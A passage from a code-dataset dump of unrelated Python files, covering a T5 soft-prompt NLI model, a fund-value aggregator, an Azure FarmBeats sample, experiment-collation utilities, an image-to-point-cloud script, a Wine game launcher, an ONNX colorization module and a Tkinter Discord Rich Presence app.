self.t5=T5ForConditionalGeneration.from_pretrained(checkpoint,config=self.config) \n self.tokenizer=T5Tokenizer.from_pretrained(checkpoint)\n self.soft_embedding_layer=None \n self.normal_embedding_layer=self.t5.get_input_embeddings()\n self.soft_prompt=soft_prompt\n if soft_prompt: \n \n self.prefix_soft_index,self.infix_soft_index,self.suffix_soft_index=eval(prefix),eval(infix),eval(suffix)\n #[3,27569,10],[11167,10],[31484,17,10,1]\n self.p_num,self.i_num,self.s_num=len(self.prefix_soft_index),len(self.infix_soft_index),len(self.suffix_soft_index)\n self.prefix_soft_embedding_layer=nn.Embedding(\n self.p_num,self.config.hidden_size\n )\n self.infix_soft_embedding_layer=nn.Embedding(\n self.i_num,self.config.hidden_size\n )\n self.suffix_soft_embedding_layer=nn.Embedding(\n self.s_num,self.config.hidden_size\n )\n \n self.prefix_soft_embedding_layer.weight.data=torch.stack(\n [self.normal_embedding_layer.weight.data[i,:].clone().detach().requires_grad_(True) for i in self.prefix_soft_index]\n )\n self.infix_soft_embedding_layer.weight.data=torch.stack(\n [self.normal_embedding_layer.weight.data[i,:].clone().detach().requires_grad_(True) for i in self.infix_soft_index]\n )\n self.suffix_soft_embedding_layer.weight.data=torch.stack(\n [self.normal_embedding_layer.weight.data[i,:].clone().detach().requires_grad_(True) for i in self.suffix_soft_index]\n )\n self.prefix_soft_ids=torch.tensor(range(self.p_num))\n self.infix_soft_ids=torch.tensor(range(self.i_num))\n self.suffix_soft_ids=torch.tensor(range(self.s_num))\n for param in self.t5.parameters():\n param.requires_grad_(False)\n 
\n\n def forward(self,input_ids,attention_mask,hypothesis_ids,premise_ids,hypothesis_attention_mask,premise_attention_mask,labels):\n batch_size=input_ids.shape[0]\n decoder_input_ids=torch.zeros(batch_size,1,dtype=int).to(input_ids.device)\n if self.soft_prompt:\n \n prefix_soft_ids=torch.stack([self.prefix_soft_ids for i in range(batch_size)]).to(input_ids.device)\n infix_soft_ids=torch.stack([self.infix_soft_ids for i in range(batch_size)]).to(input_ids.device)\n suffix_soft_ids=torch.stack([self.suffix_soft_ids for i in range(batch_size)]).to(input_ids.device)\n \n prefix_soft_embeddings=self.prefix_soft_embedding_layer(prefix_soft_ids)\n infix_soft_embeddings=self.infix_soft_embedding_layer(infix_soft_ids)\n suffix_soft_embeddings=self.suffix_soft_embedding_layer(suffix_soft_ids)\n \n hypothesis_embeddings=self.normal_embedding_layer(hypothesis_ids)\n premise_embeddings=self.normal_embedding_layer(premise_ids)\n \n \n input_embeddings=torch.cat(\n [prefix_soft_embeddings,hypothesis_embeddings,infix_soft_embeddings,premise_embeddings,suffix_soft_embeddings],\n dim=1\n )\n \n prefix_soft_attention_mask=torch.ones(batch_size,self.p_num).to(input_ids.device)\n infix_soft_attention_mask=torch.ones(batch_size,self.i_num).to(input_ids.device)\n suffix_soft_attention_mask=torch.ones(batch_size,self.s_num).to(input_ids.device)\n \n attention_mask=torch.cat(\n [prefix_soft_attention_mask,hypothesis_attention_mask,infix_soft_attention_mask,premise_attention_mask,suffix_soft_attention_mask],\n dim=1\n )\n if self.original_t5:\n batch_loss=self.t5(\n inputs_embeds=input_embeddings,\n labels=labels,\n attention_mask=attention_mask,\n return_dict=True\n ).loss\n return None,batch_loss\n else:\n output=self.t5(\n inputs_embeds=input_embeddings,\n decoder_input_ids=decoder_input_ids,\n attention_mask=attention_mask,\n return_dict=True\n )\n else:\n if self.original_t5:\n batch_loss=self.t5(\n input_ids=input_ids,\n labels=labels,\n attention_mask=attention_mask,\n return_dict=True\n ).loss\n return None,batch_loss\n else:\n output=self.t5(\n input_ids=input_ids,\n decoder_input_ids=decoder_input_ids,\n attention_mask=attention_mask,\n return_dict=True\n )\n logits=output.logits\n batch_score=logits[:,0,[1176,7163,6136]]\n return batch_score,None\n\n \n \n\n \n\n","repo_name":"NEUIR/P3Ranker","sub_path":"Prefinetune/mnli_model.py","file_name":"mnli_model.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"54"} +{"seq_id":"26036971385","text":"if __package__:\n from .provider.equity import *\nelse:\n from provider.equity import *\nfrom datetime import datetime, timedelta\nfrom dateutil import tz\nfrom itertools import chain, groupby\nfrom decimal import Decimal\n\n# 以每日此时间前收盘作为交易日分界\nTRADING_START_HOUR = 8\n\ntz_sh = tz.gettz('Asia/Shanghai')\nnow = datetime.now(tz=tz_sh)\nzero_today = now - timedelta(hours=now.hour, minutes=now.minute,\n seconds=now.second, microseconds=now.microsecond)\nTRADE_TODAY = zero_today + timedelta(hours=TRADING_START_HOUR)\n\n\ndef divide_by_provider(equities):\n d = dict([(p['id'], (p, [])) for p in EQUITY_PROVIDER])\n for e in equities:\n d[e['source']][1].append(e)\n return d\n\n\ndef get_data_from_provider(provider, equities):\n source_ids = [e['source_id'] for e in equities]\n res = provider['object'].realtime(source_ids)\n for item in equities:\n item_res = filter(lambda r: r['source_id'] == item['source_id'], res)\n try:\n status = next(item_res)\n item.update(status)\n except 
StopIteration:\n continue\n return equities\n\n\ndef get_history_from_provider(provider, equities, **kwargs):\n items = []\n for e in equities:\n r = e.copy()\n r['history'] = provider['object'].history(e['source_id'], **kwargs)\n items.append(r)\n return items\n\n\ndef combine_summary(d):\n equities = list(chain(*d.values()))\n for e in equities:\n e['weight'] = Decimal(e['weight'])\n equities.sort(key=lambda e: e['weight'], reverse=True)\n\n latest = datetime.min.replace(tzinfo=tz_sh)\n total_w, total_p, today_w, today_p = Decimal(\n 0), Decimal(0), Decimal(0), Decimal(0)\n for e in equities:\n total_p += e['weight'] * e['change_percent'] / 100\n total_w += e['weight']\n latest = max(e['time'], latest)\n if e['time'] >= TRADE_TODAY:\n today_p += e['weight'] * e['change_percent'] / 100\n today_w += e['weight']\n total_p /= total_w / 100\n if today_w > 0:\n today_p /= today_w / 100\n\n return equities, {\n 'last_update': latest,\n 'total_weight': total_w,\n 'total_percent': total_p,\n 'today_weight': today_w,\n 'today_percent': today_p\n }\n\n\ndef single_fetch(equity):\n d = dict([(p['id'], p) for p in EQUITY_PROVIDER])\n return get_data_from_provider(d[equity['source']], [equity])[0]\n\ndef fetch(equities):\n d = divide_by_provider(equities)\n for provider in d:\n d[provider] = get_data_from_provider(*d[provider])\n return combine_summary(d)\n\ndef fetch_history(equities, **kwargs):\n d = divide_by_provider(equities)\n s = []\n for provider in d:\n s += get_history_from_provider(*d[provider], **kwargs)\n return s\n","repo_name":"lxhkkll/qdii-value","sub_path":"qdii_value/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"3500116352","text":"from azure.identity.aio import DefaultAzureCredential\nfrom azure.agrifood.farming.aio import FarmBeatsClient\nfrom datetime import datetime\nimport os\nfrom dotenv import load_dotenv\nimport asyncio\nimport random\n\n\nasync def create_party():\n farmbeats_endpoint = os.environ['FARMBEATS_ENDPOINT']\n\n credential = DefaultAzureCredential()\n client = FarmBeatsClient(\n endpoint=farmbeats_endpoint,\n credential=credential\n )\n\n party_id = f\"contoso-party-{random.randint(0,1000)}\"\n\n # Create or update a party within FarmBeats.\n party = await client.parties.create_or_update(\n party_id=party_id,\n party={\n \"name\": \"contoso party\",\n \"status\": \"created from SDK\",\n \"description\": \"created from SDK\"\n }\n )\n print(party)\n\n await client.close()\n await credential.close()\n\nif __name__ == \"__main__\":\n load_dotenv()\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n asyncio.run(create_party())","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/agrifood/azure-agrifood-farming/samples/async/sample_create_farmer_async.py","file_name":"sample_create_farmer_async.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"27844062278","text":"import csv\n\nfrom pathlib import Path\nfrom typing import Any, Iterable, Dict, Literal, Sequence, TypeVar, overload\n\nimport pandas as pd\n\nfrom ruamel.yaml import YAML\nfrom tensorboard.backend.event_processing.event_accumulator import EventAccumulator\nfrom pydrobert.param.serialization import register_serializer\n\nfrom scpc.train import LightningPretrainedFrontendParams as Params\n\n__all__ = [\n \"collate_data\",\n \"check_data\",\n 
\"filter_data_in\",\n \"filter_data_equal\",\n]\n\nMODEL_BLACKLIST = (\n \"cpc.mono\",\n \"cpc.deft\",\n \"cpc.tri\",\n \"superb.fbank\",\n)\n\n\nregister_serializer(\"reckless_json\")\n\n\ndef collate_data(\n results_from: Literal[\"zrc\", \"tb\"] = \"zrc\",\n exp_dir: str = \"../exp\",\n model_blacklist: Sequence[str] = MODEL_BLACKLIST,\n collapse_distributed: bool = True,\n):\n \"\"\"Combine experiment parameters and results\"\"\"\n yaml = YAML(typ=\"safe\", pure=True)\n\n model_data, res_data = [], []\n exp_dir: Path = Path(exp_dir)\n for id, pth in enumerate(exp_dir.glob(\"*/*/model.yaml\")):\n model, version = pth.parts[-3:-1]\n if model in model_blacklist:\n continue\n\n datum = yaml.load(pth)\n datum[\"id\"] = id\n # clobbers useless 'name' field\n datum[\"name\"] = f\"{model}/{version}\"\n datum[\"version\"] = int(version.split(\"_\")[1])\n model_data.append(datum)\n\n if results_from == \"zrc\":\n for zrc_pth in pth.parent.glob(\n \"zrc/librispeech/**/scores/score_all_phonetic.csv\"\n ):\n pca_style = zrc_pth.parts[-3]\n assert pca_style == \"full\" or pca_style.startswith(\"pca_\"), zrc_pth\n with zrc_pth.open(newline=\"\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n row[\"pca_style\"] = pca_style\n row[\"score\"] = float(row[\"score\"])\n datum = dict(id=id, zrc=row)\n res_data.append(datum)\n elif results_from == \"tb\":\n for event_path in exp_dir.glob(f'tb_logs/{datum[\"name\"]}/events.*'):\n ea = EventAccumulator(str(event_path))\n ea.Reload()\n if ({\"epoch\", \"val_loss\"} - set(ea.Tags()[\"scalars\"])) != set():\n continue\n for epoch, val_loss in zip(ea.Scalars(\"epoch\"), ea.Scalars(\"val_loss\")):\n assert epoch.step == val_loss.step\n datum = dict(\n id=id,\n tb=dict(\n step=int(epoch.step),\n epoch=int(epoch.value),\n val_loss=val_loss.value,\n ),\n )\n res_data.append(datum)\n else:\n raise NotImplementedError\n\n df = pd.json_normalize(model_data).set_index(\"id\")\n\n # throw away columns we probably don't care about\n df = df.drop(\n list(df.filter(regex=r\"\\.name$\").columns)\n + [\n \"system_description\",\n \"training.accelerator\",\n \"training.cpc_loss.speaker_regex\",\n ],\n axis=1,\n )\n\n # for convenience, we remap any rows with context_type == 'id' to\n # context_type == 'csa', but with 0 layers and max_width 1\n # idx = df['context_type'] == 'id'\n df.loc[\n df[\"context_type\"] == \"id\",\n [\n \"context_type\",\n \"csa.num_layers\",\n \"csa.num_heads\",\n \"csa.dim_feedforward\",\n \"csa.max_width\",\n ],\n ] = [\"csa\", 0, 8, 1024, 1]\n\n # depopulate the values which were not selected\n latent_types: Sequence[str] = Params.param.latent_type.objects\n for latent_type in latent_types:\n latent_ne_idx = df[\"latent_type\"] != latent_type\n latent_cols = df.filter(regex=f\"^{latent_type}\\\\.\").columns\n df.loc[latent_ne_idx, latent_cols] = pd.NA\n\n context_types: Sequence[str] = Params.param.context_type.objects\n for context_type in context_types:\n context_ne_idx = df[\"context_type\"] != context_type\n context_cols = df.filter(regex=f\"^{context_type}\\\\.\").columns\n df.loc[context_ne_idx, context_cols] = pd.NA\n\n loss_types: Sequence[str] = Params.param.training.class_.param.loss_type.objects\n for loss_type in loss_types:\n loss_ne_idx = df[\"training.loss_type\"] != loss_type\n loss_cols = df.filter(\n regex=f\"^training\\\\.{loss_type.replace('-', '_')}_loss\"\n ).columns\n df.loc[loss_ne_idx, loss_cols] = pd.NA\n\n if collapse_distributed:\n # make turn task-level sizes into global sizes by multiplying by num_devices and\n 
# num_nodes\n num_devices = df[\"training.num_devices\"].fillna(1)\n num_nodes = df[\"training.num_nodes\"].fillna(1)\n df[\"training.data.common.batch_size\"] *= (num_devices * num_nodes).astype(\n df[\"training.data.common.batch_size\"].dtype\n )\n chunk_idx = df[\"training.chunking.max_chunks\"].notna()\n df.loc[chunk_idx, \"training.chunking.max_chunks\"] *= (\n (num_devices * num_nodes)\n .astype(df[\"training.chunking.max_chunks\"].dtype)\n .loc[chunk_idx]\n )\n\n df = df.drop([\"training.num_devices\", \"training.num_nodes\"], axis=1)\n\n df = pd.json_normalize(res_data).join(df, on=\"id\", validate=\"m:1\")\n df = df.drop(\n [\"id\", \"training.data.common.subset_ids\"], axis=1\n ) # we no longer need this\n\n df = df.dropna(axis=1, how=\"all\") # remove columns which are all NA\n\n # make all string-based entries categorical\n df = df.astype(dict((x, \"category\") for x in df.columns if df[x].dtype.char == \"O\"))\n\n return df\n\n\ndef check_data(df: pd.DataFrame, *cols: str) -> None:\n \"\"\"Check that the provided cols are the only ones moving and there are no N/As\"\"\"\n not_cols = set(cols) - set(str(x) for x in df.columns)\n if not_cols:\n raise ValueError(f\"df does not contain colums: {not_cols}\")\n\n # check that values in cols are non-null\n for col in cols:\n if df[col].isna().any():\n raise ValueError(f\"col '{col}' from var contains N/A value(s)\")\n\n # now check that the only remaining variable columns can be found in cols\n # (except \"name\" and \"version\", which are probably varying with the values in cols)\n for col in df.columns:\n if col in cols or col in (\"name\", \"version\"):\n continue\n unique_vals = df[col].unique()\n if len(unique_vals) > 1:\n raise ValueError(f\"Column '{col}' contains values '{unique_vals}'\")\n\n\nA = TypeVar(\"A\")\n\n\ndef _filter_preamble(\n df: pd.DataFrame, args: Sequence[Dict[str, A]], kwargs: Dict[str, A],\n) -> Dict[str, A]:\n if len(args) > 1 or (len(args) == 1) == (len(kwargs) > 0):\n raise ValueError(\"Either pass dict or keyword args\")\n\n if len(args) == 1:\n col2x = args[0]\n else:\n col2x = kwargs\n\n not_cols = set(col2x) - set(str(x) for x in df.columns)\n if not_cols:\n raise ValueError(f\"df does not contain colums: {not_cols}\")\n\n return col2x\n\n\n@overload\ndef filter_data_in(df: pd.DataFrame, col2seq: Dict[str, Iterable[Any]]) -> pd.DataFrame:\n ...\n\n\n@overload\ndef filter_data_in(df: pd.DataFrame, **col_seq: Iterable[Any]) -> pd.DataFrame:\n ...\n\n\ndef filter_data_in(\n df: pd.DataFrame, *args: Dict[str, Iterable[Any]], **kwargs: Iterable[Any]\n) -> pd.DataFrame:\n \"\"\"Filter data with column values matching a value in iterables passed\"\"\"\n col2seq = _filter_preamble(df, args, kwargs)\n\n idx = True\n for col, seq in col2seq.items():\n idx = df[col].isin(list(seq)) & idx\n\n return df.loc[idx]\n\n\n@overload\ndef filter_data_equal(df: pd.DataFrame, col2val: Dict[str, Any]) -> pd.DataFrame:\n ...\n\n\n@overload\ndef filter_data_equal(df: pd.DataFrame, **col_val: Any) -> pd.DataFrame:\n ...\n\n\ndef filter_data_equal(\n df: pd.DataFrame, *args: Dict[str, Any], **kwargs: Any\n) -> pd.DataFrame:\n \"\"\"Filter data with column values matching those passed\"\"\"\n col2val = _filter_preamble(df, args, kwargs)\n\n idx = True\n for col, val in col2val.items():\n idx = (df[col] == val) & idx\n\n return 
df.loc[idx]\n","repo_name":"sdrobert/scpc","sub_path":"scripts/exp_utils.py","file_name":"exp_utils.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7951264731","text":"import os\nimport img2ply\n#import pdb\n\nif __name__ == \"__main__\": \n # get path\n image_path = \"/home/ms/Desktop/Point_Cloud_Monjoy/data_19Jan2021/1_image_data/\"\n save_path = \"/home/ms/Desktop/Point_Cloud_Monjoy/data_19Jan2021/2_ply_data/\"\n source_folders = os.listdir(image_path)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n print(\"Created ouput directory: \" + save_path)\n for single_folder in source_folders:\n fname_image_folder = os.path.basename(single_folder)\n #print(single_file)\n input = (image_path + single_folder)\n ply = (save_path +fname_image_folder +\".ply\")\n \n img2ply.convert(\n input, \n ply, \n [15.0, 10.0, 15.0],\n direction=\"y\", \n inverse=True,\n ignoreAlpha=True,\n wSamples=0, \n hSamples=0, \n maintainAspectRatio=True\n #get list of png source files\n \n #pdb.set_trace()\n # get input and output\n #input = os.path.join(path, \"images\")\n #ply = os.path.join(path, \"new_modified.ply\")\n \n # convert\n# img2ply.convert(\n# input, \n# ply, \n# [15.0, 10.0, 15.0],\n# direction=\"y\", \n# inverse=True,\n# ignoreAlpha=True,\n# wSamples=0, \n# hSamples=0, \n# maintainAspectRatio=True\n )\n","repo_name":"sharmalab/GGOs_COVID-19","sub_path":"1_Convert_images_to_point_cloud/2a_convert_monjoy.py","file_name":"2a_convert_monjoy.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32148344664","text":"#!/usr/bin/env python3\nimport os\nimport subprocess\nimport json\n\njson_file_path = os.path.expanduser(\"~/.config/league_install_path.json\")\n\nwith open(json_file_path, \"r\") as json_file:\n settings = json.load(json_file)\n game_installed_folder = settings[\"game_main_dir\"]\n os.chdir(game_installed_folder)\n\ngame_main_dir = os.path.join(game_installed_folder)\ngame_main_wine_dir = os.path.join(game_main_dir, \"wine\")\ngame_prefix_dir = os.path.join(game_main_wine_dir, \"prefix\")\ngame_exe_path = os.path.join(game_prefix_dir, \"drive_c\", \"Riot Games\", \"Riot Client\")\ngame_exe_file_name = \"RiotClientServices.exe\"\nwine_loader_path = os.path.join(game_main_wine_dir, \"wine-build\", \"bin\", \"wine\")\n\nenv_vars_file_path = os.path.join(game_installed_folder, \"env_vars.json\")\n\nwith open(env_vars_file_path, \"r\") as env_vars_file:\n env_vars = json.load(env_vars_file)\n game_launcher_options = env_vars.get(\"game_launcher_options\", {})\n\n# Replace placeholders in game launcher options with actual values\ngame_launcher_options[\"PATH\"] = os.path.join(game_main_wine_dir, \"wine-build\", \"bin\")\ngame_launcher_options[\"WINEPREFIX\"] = game_prefix_dir\ngame_launcher_options[\"WINELOADER\"] = wine_loader_path\n\nstart_game_vars = dict(os.environ, **game_launcher_options)\n\nwine_process = [\n game_launcher_options[\"WINELOADER\"],\n os.path.join(game_exe_path, game_exe_file_name),\n \"--launch-product=league_of_legends\",\n \"--launch-patchline=live\",\n]\n\nsubprocess.run(wine_process, env=start_game_vars, 
check=True)\n","repo_name":"kassindornelles/lol-for-linux-installer","sub_path":"src/launch-script.py","file_name":"launch-script.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"54"} +{"seq_id":"24916521824","text":"import os\nimport onnxruntime\nimport torch\nimport numpy as np\nimport wandb\nfrom PIL import Image\nfrom colorize_model.utils import lab_to_rgb\nfrom constants import wandb_project_path\n\n\nwandb_api = wandb.Api()\nmodel_artifact = wandb_api.artifact(f\"{wandb_project_path}/generator:best\")\nmodel_dir = model_artifact.download(root=\"colorize_model/saved_models\")\nmodel_path = os.path.join(model_dir, \"generator.onnx\")\n\nort_session = onnxruntime.InferenceSession(model_path)\nmetadata = ort_session.get_modelmeta()\nprint(f\"Model Description: {metadata.description}\")\nprint(f\"Model metadata: {metadata.custom_metadata_map}\")\n\n\ndef to_numpy(tensor):\n return tensor.detach().cpu().numpy() if tensor.requires_grad else tensor.cpu().numpy()\n\n\ndef process_image(image_l, size=(256, 256)) -> torch.tensor:\n image_l = Image.open(image_l).convert(\"L\")\n original_size = image_l.size\n image_l = image_l.resize(size, Image.Resampling.BICUBIC)\n image_l = np.asarray(image_l).astype(\"float32\")\n image_l = (image_l / 255 * 100) / 50. - 1.\n image_l = torch.tensor(image_l).unsqueeze(0).unsqueeze(0)\n return image_l, original_size\n\n\ndef get_colorized_image(image_l) -> np.array:\n image_l, original_size = process_image(image_l, size=(256, 256))\n\n ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(image_l)}\n ort_outs = ort_session.run(None, ort_inputs)\n image_ab = torch.tensor(ort_outs[0])\n\n image_rgb = lab_to_rgb(image_l, image_ab)\n image_rgb = (image_rgb.squeeze(0) * 255).astype(np.uint8)\n image_rgb = Image.fromarray(image_rgb)\n image_rgb = image_rgb.resize(original_size, Image.Resampling.BICUBIC)\n return image_rgb\n","repo_name":"ESkripichnikov/image-colorization-api","sub_path":"colorize_model/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4779464278","text":"from keras.preprocessing.image import ImageDataGenerator\n# from keras.preprocessing.sequence import\n\n\nimg_width, img_height = 28, 28\n\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/validation'\n# nb_train_samples = 1\n# nb_validation_samples = 2\nepochs = 1\nbatch_size = 2\n\n# this is the augmentation configuration we will use for training\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\n# this is the augmentation configuration we will use for testing:\n# only rescaling\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\ntest_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\ntrain_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\nitr = train_datagen.flow_from_directory(\ntrain_data_dir,\ntarget_size=(img_width, img_height),\nbatch_size=1,\nclass_mode='binary')\n\nX, y = itr.next()\n\n","repo_name":"jassim-jasmin/ai","sub_path":"other/CBIR/getDataset.py","file_name":"getDataset.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"11656979139","text":"import discordrp\nimport time\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport json\nimport threading\n\nclient_id = \"your_application_id\" # you can visit the discord developar portal to generate one.\n\ndef update_presence():\n try:\n state = state_entry.get()\n details = details_entry.get()\n large_image = large_image_entry.get()\n large_text = large_text_entry.get()\n small_image = small_image_entry.get()\n small_text = small_text_entry.get()\n\n button1_label = button1_label_entry.get()\n button1_url = button1_url_entry.get()\n\n button2_label = button2_label_entry.get()\n button2_url = button2_url_entry.get()\n\n presence_data = {\n \"state\": state,\n \"details\": details,\n \"timestamps\": {\n \"start\": int(time.time()),\n },\n \"assets\": {\n \"large_image\": large_image,\n \"large_text\": large_text,\n \"small_image\": small_image,\n \"small_text\": small_text,\n },\n \"buttons\": [\n {\n \"label\": button1_label,\n \"url\": button1_url,\n },\n {\n \"label\": button2_label,\n \"url\": button2_url,\n },\n ],\n }\n presence.set(presence_data)\n status_label.config(text=\"Presence updated\")\n except Exception as e:\n status_label.config(text=\"Error: \" + str(e))\ndef exit_application():\n root.quit()\ndef save_presence():\n presence_data = {\n \"state\": state_entry.get(),\n \"details\": details_entry.get(),\n \"large_image\": large_image_entry.get(),\n \"large_text\": large_text_entry.get(),\n \"small_image\": small_image_entry.get(),\n \"small_text\": small_text_entry.get(),\n \"button1_label\": button1_label_entry.get(),\n \"button1_url\": button1_url_entry.get(),\n \"button2_label\": button2_label_entry.get(),\n \"button2_url\": button2_url_entry.get(),\n }\n\n file_path = filedialog.asksaveasfilename(defaultextension=\".json\", filetypes=[(\"JSON Files\", \"*.json\")])\n if file_path:\n with open(file_path, \"w\") as file:\n json.dump(presence_data, file)\n status_label.config(text=f\"Presence saved to {file_path}\")\ndef load_presence():\n file_path = filedialog.askopenfilename(filetypes=[(\"JSON Files\", \"*.json\")])\n if file_path:\n with open(file_path, \"r\") as file:\n presence_data = json.load(file)\n state_entry.delete(0, tk.END)\n state_entry.insert(0, presence_data.get(\"state\", \"\"))\n details_entry.delete(0, tk.END)\n details_entry.insert(0, presence_data.get(\"details\", \"\"))\n large_image_entry.delete(0, tk.END)\n large_image_entry.insert(0, presence_data.get(\"large_image\", \"\"))\n large_text_entry.delete(0, tk.END)\n large_text_entry.insert(0, presence_data.get(\"large_text\", \"\"))\n small_image_entry.delete(0, tk.END)\n small_image_entry.insert(0, presence_data.get(\"small_image\", \"\"))\n small_text_entry.delete(0, tk.END)\n small_text_entry.insert(0, presence_data.get(\"small_text\", \"\"))\n button1_label_entry.delete(0, tk.END)\n button1_label_entry.insert(0, presence_data.get(\"button1_label\", \"\"))\n button1_url_entry.delete(0, tk.END)\n button1_url_entry.insert(0, presence_data.get(\"button1_url\", \"\"))\n button2_label_entry.delete(0, tk.END)\n 
button2_label_entry.insert(0, presence_data.get(\"button2_label\", \"\"))\n button2_url_entry.delete(0, tk.END)\n button2_url_entry.insert(0, presence_data.get(\"button2_url\", \"\"))\n status_label.config(text=f\"Presence loaded from {file_path}\")\ndef stop_presence():\n presence.clear()\n status_label.config(text=\"Presence stopped\")\ndef display_help():\n help_text = \"\"\"Discord Rich Presence Help\n- State: The state of your current activity.\n- Details: Details about your current activity.\n- Large Image assest code or url: the image assest code generated in the developer portal rich presence section or you can use the image url.\n- Image Text: Text to display for the large image.\n- Small Image assest code or url: the image assest code generated in the developer portal rich presence section or you can use the image url.\n- Small Image Text: Text to display for the small image.\n- Button 1 Label: Label for the first button.\n- Button 1 URL: URL to open when the first button is clicked.\n- Button 2 Label: Label for the second button.\n- Button 2 URL: URL to open when the second button is clicked.\nClick 'Update Presence' to update your Discord Rich Presence based on the provided information.\n\ndevelopor: ore.e\n\"\"\"\n help_window = tk.Toplevel(root)\n help_window.title(\"Help\")\n help_label = ttk.Label(help_window, text=help_text, wraplength=400, font=(\"Arial\", 12))\n help_label.pack(padx=10, pady=10)\ndef toggle_dark_mode():\n dark_mode = dark_mode_var.get()\n if dark_mode:\n background_color = \"#333\"\n foreground_color = \"#EEE\"\n button_background_color = \"black\"\n button_foreground_color = \"white\"\n else:\n background_color = \"white\"\n foreground_color = \"black\"\n button_background_color = \"#4CAF50\"\n button_foreground_color = \"white\"\n root.tk_setPalette(background=background_color, foreground=foreground_color)\n style.configure(\"Custom.TLabel\", foreground=foreground_color)\n style.configure(\"Custom.TEntry\", background=background_color, foreground=foreground_color)\n style.configure(\"Custom.TButton\", background=button_background_color, borderwidth=1, relief=\"raised\")\n style.configure(\"Round.TButton\", background=button_background_color, borderwidth=1, relief=\"raised\", foreground=button_foreground_color)\n update_button.configure(style=\"RoundDark.TButton\" if dark_mode else \"Round.TButton\")\n\n\nroot = tk.Tk()\nroot.title(\"Discord Rich Presence\")\nroot.grid_rowconfigure(0, weight=1)\nroot.grid_columnconfigure(0, weight=1)\nstyle = ttk.Style()\nstyle.theme_use(\"clam\") \nstyle.configure(\"Custom.TLabel\", padding=5, font=(\"Arial\", 12))\nstyle.configure(\"Custom.TEntry\", padding=5, font=(\"Arial\", 12))\nstyle.configure(\"Custom.TButton\", padding=5, relief=\"raised\", background=\"#4CAF50\", borderwidth=1)\nstyle.configure(\"Round.TButton\", padding=5, relief=\"raised\", background=\"#4CAF50\", borderwidth=1, foreground=\"white\")\nstyle.configure(\"RoundDark.TButton\", padding=5, relief=\"raised\", background=\"#4CAF50\", borderwidth=1, foreground=\"black\")\ndark_mode_var = tk.BooleanVar(value=False)\ndef create_label_entry(parent, text, row, col):\n label = ttk.Label(parent, text=text, style=\"Custom.TLabel\")\n label.grid(row=row, column=col, sticky=\"w\")\n entry = ttk.Entry(parent, style=\"Custom.TEntry\")\n entry.grid(row=row, column=col+1, sticky=\"ew\")\n return entry\n \nrow = 0\nstate_entry = create_label_entry(root, \"State:\", row, 0)\nrow += 1\ndetails_entry = create_label_entry(root, \"Details:\", row, 0)\nrow += 
1\nlarge_image_entry = create_label_entry(root, \"Large Image assest code/url:\", row, 0)\nrow += 1\nlarge_text_entry = create_label_entry(root, \"Image Text:\", row, 0)\nrow += 1\nsmall_image_entry = create_label_entry(root, \"Small Image assest code/url:\", row, 0)\nrow += 1\nsmall_text_entry = create_label_entry(root, \"Small Image Text:\", row, 0)\nrow += 1\nbutton1_label_entry = create_label_entry(root, \"Button 1 Label:\", row, 0)\nrow += 1\nbutton1_url_entry = create_label_entry(root, \"Button 1 URL:\", row, 0)\nrow += 1\nbutton2_label_entry = create_label_entry(root, \"Button 2 Label:\", row, 0)\nrow += 1\nbutton2_url_entry = create_label_entry(root, \"Button 2 URL:\", row, 0)\nrow += 1\nupdate_button = ttk.Button(root, text=\"Update Presence\", command=update_presence, style=\"Round.TButton\")\nupdate_button.grid(row=row, column=0, columnspan=2, pady=(10, 20), sticky=\"w\")\nstop_button = ttk.Button(root, text=\"Stop Presence\", command=stop_presence, style=\"RoundStop.TButton\")\nstop_button.grid(row=row, column=2, columnspan=2, pady=(10, 20), sticky=\"w\")\ndark_mode_checkbutton = ttk.Checkbutton(root, text=\"Dark Mode\", variable=dark_mode_var, command=toggle_dark_mode, style=\"Custom.TLabel\")\ndark_mode_checkbutton.grid(row=0, column=3, padx=10)\nstatus_label = ttk.Label(root, text=\"\", style=\"Custom.TLabel\")\nstatus_label.grid(row=row+1, column=0, columnspan=4)\nmenu = tk.Menu(root)\nroot.config(menu=menu)\nfile_menu = tk.Menu(menu)\nmenu.add_cascade(label=\"File\", menu=file_menu)\nfile_menu.add_command(label=\"Save\", command=save_presence)\nfile_menu.add_command(label=\"Load\", command=load_presence)\nfile_menu.add_separator()\nfile_menu.add_command(label=\"Exit\", command=exit_application)\nhelp_menu = 